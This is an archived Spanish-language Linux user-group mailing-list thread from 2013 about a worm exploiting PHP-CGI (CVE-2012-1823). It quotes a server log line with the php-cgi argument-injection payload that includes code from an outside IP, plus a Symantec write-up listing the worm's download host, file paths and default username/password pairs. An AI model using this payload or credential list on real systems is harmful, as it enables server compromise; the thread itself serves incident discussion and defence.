[Lugro-principiantes] Nuevo gusano que afecta GNU/Linux

Omar Arino omar.arino en linuxdojo.com.ar
Mie Dic 4 11:07:54 ART 2013


El 4 de diciembre de 2013 11:04, Omar
Arino<omar.arino en linuxdojo.com.ar>escribió:

>
>
> El 4 de diciembre de 2013 10:36, Sacanti Ernesto<sacanti.ernesto en gmail.com
> > escribió:
>
> El 03/12/13 23:50, Martín Carr escribió:
>>
>>  2013/12/3, E S<micta2003 en yahoo.com>:
>>>
>>>> Estimados
>>>>
>>>> No me queda claro como me puede afectar este gusano. Tengo LinuxMint 15
>>>> y
>>>> soy un usuario comun. Esas recomendaciones son para redes?
>>>>
>>>
>>> Salvo que uses tu computadora como un servidor web (para alojar
>>> páginas dinámicas que usan el lenguaje PHP) y no la hayas actualizado,
>>> no tenés que preocuparte.
>>>
>>> Saludos!
>>>
>>>  No se si sera esto, pero encontre en mi servidor este log:
>> /usr/lib/cgi-bin/php -d allow_url_include=on -d safe_mode=off -d
>> suhosin.simulation=on -d disable_functions=\"\" -d open_basedir=none -d
>> auto_prepend_file=http://82.221.102.181/robots.txt -d
>> cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
>>
>>
Te paso mas datos:



>  *Discovered:* November 26, 2013*Updated:*November 28, 2013 12:43:59 AM
> *Type:*Worm*Infection Length:* Varies*Systems Affected:*Linux *CVE
> References:*CVE-2012-1823<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823>
> , CVE-2012-2311<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2311>
> , CVE-2012-2335<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2335>
> , CVE-2012-2336<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2336>
> The worm propagates by exploiting the PHP 'php-cgi' Information
> Disclosure Vulnerability <http://www.securityfocus.com/bid/53388> (CVE-2012-1823)
> through http POST requests.
>
> If the target is vulnerable, it downloads and executes the worm from the
> following URL:
> [http://]www.gpharma.co
>
> When the worm is executed, it copies itself as the following file:
> /tmp/x86
>
> The worm creates the following directory:
> /var/run/.zollard/
>
> The worm attempts to force load ip_table or iptable from the following
> locations:
>
>    - /lib/modules/[OS VERSION]/kernel/net/ipv4/netfilter/ip_tables.ko
>    - /lib/modules/[OS VERSION]/kernel/net/ipv4/netfilter/iptable_filter.ko
>
>
> The worm configures iptable to drop packets on TCP port 23 and prevents
> remote users from connecting to the compromised computer.
>
> The worm attempts to terminate the following process:
> telnetd
>
> The worm attempts to terminate the following processes and delete the
> files:
>
>    - /var/run/.lightpid
>    - /var/run/.aidrapid
>    - /var/run/lightpid
>
>
> The worm deletes the following files:
>
>    - /var/run/.lightscan
>    - /var/run/lightscan
>    - /var/run/mipsel
>    - /var/run/mips
>    - /var/run/sh
>    - /var/run/arm
>    - /var/run/ppc
>    - /var/run/m
>    - /var/run/mi
>    - /var/run/s
>    - /var/run/a
>    - /var/run/p
>    - /var/run/msx
>    - /var/run/mx
>    - /var/run/sx
>    - /var/run/ax
>    - /var/run/px
>    - /var/run/32
>    - /var/run/sel
>    - /var/run/pid
>    - /var/run/gcc
>    - /var/run/dev
>    - /var/run/psx
>    - /var/run/mpl
>    - /var/run/mps
>    - /var/run/sph
>    - /var/run/arml
>    - /var/run/mips.l
>    - /var/run/mipsell
>    - /var/run/ppcl
>    - /var/run/shl
>    - /bin/pp
>    - /bin/mi
>    - /bin/mii
>    - /var/tmp/dreams.install.sh
>    - /var/tmp/ep2.ppc
>    - /usr/bin/wget
>    - /usr/bin/-wget
>
>
> The worm generates random IP addresses excluding the following:
>
>    - 0.0.0.0 - 0.255.255.255
>    - 127.0.0.1 - 127.255.255.255
>    - 192.0.2.0 - 192.0.2.255
>    - 198.51.100.0 - 198.51.100.255
>    - 203.0.113.0 - 203.0.113.255
>    - 255.255.255.255
>
>
> If an IP address is reachable, the worm attempts to access the following
> paths:
>
>    - /cgi-bin/php
>    - /cgi-bin/php5
>    - /cgi-bin/php-cgi
>    - /cgi-bin/php.cgi
>    - /cgi-bin/php4
>
>
> If user authentication is required, the worm attempts the following user
> name and password combinations (user name/password):
>
>    - admin/admin
>    - root/[BLANK]
>    - root/root
>    - admin/1234
>    - admin/12345
>    - root/admin
>    - root/dreambox
>    - admin/smcadmin
>    - admin/[BLANK]
>
>
>
> Recommendations
>
> Symantec Security Response encourages all users and administrators to
> adhere to the following basic security "best practices":
>
>    - Use a firewall to block all incoming connections from the Internet
>    to services that should not be publicly available. By default, you should
>    deny all incoming connections and only allow services you explicitly want
>    to offer to the outside world.
>    - Enforce a password policy. Complex passwords make it difficult to
>    crack password files on compromised computers. This helps to prevent or
>    limit damage when a computer is compromised.
>    - Ensure that programs and users of the computer use the lowest level
>    of privileges necessary to complete a task. When prompted for a root or UAC
>    password, ensure that the program asking for administration-level access is
>    a legitimate application.
>    - Disable AutoPlay to prevent the automatic launching of executable
>    files on network and removable drives, and disconnect the drives when not
>    required. If write access is not required, enable read-only mode if the
>    option is available.
>    - Turn off file sharing if not needed. If file sharing is required,
>    use ACLs and password protection to limit access. Disable anonymous access
>    to shared folders. Grant access only to user accounts with strong passwords
>    to folders that must be shared.
>    - Turn off and remove unnecessary services. By default, many operating
>    systems install auxiliary services that are not critical. These services
>    are avenues of attack. If they are removed, threats have less avenues of
>    attack.
>    - If a threat exploits one or more network services, disable, or block
>    access to, those services until a patch is applied.
>    - Always keep your patch levels up-to-date, especially on computers
>    that host public services and are accessible through the firewall, such as
>    HTTP, FTP, mail, and DNS services.
>    - Configure your email server to block or remove email that contains
>    file attachments that are commonly used to spread threats, such as .vbs,
>    .bat, .exe, .pif and .scr files.
>    - Isolate compromised computers quickly to prevent threats from
>    spreading further. Perform a forensic analysis and restore the computers
>    using trusted media.
>    - Train employees not to open attachments unless they are expecting
>    them. Also, do not execute software that is downloaded from the Internet
>    unless it has been scanned for viruses. Simply visiting a compromised Web
>    site can cause infection if certain browser vulnerabilities are not patched.
>    - If Bluetooth is not required for mobile devices, it should be turned
>    off. If you require its use, ensure that the device's visibility is set to
>    "Hidden" so that it cannot be scanned by other Bluetooth devices. If device
>    pairing must be used, ensure that all devices are set to "Unauthorized",
>    requiring authorization for each connection request. Do not accept
>    applications that are unsigned or sent from unknown sources.
>    - For further information on the terms used in this document, please
>    refer to the Security Response glossary<http://www.symantec.com/business/security_response/glossary.jsp>
>    .
>
> *Writeup By: *Kaoru Hayashi
>
------------ próxima parte ------------
Se ha borrado un adjunto en formato HTML...
URL: <http://lugro.org.ar/pipermail/lugro-principiantes/attachments/20131204/00cba6a1/attachment-0001.htm>


Más información sobre la lista de distribución Lugro-principiantes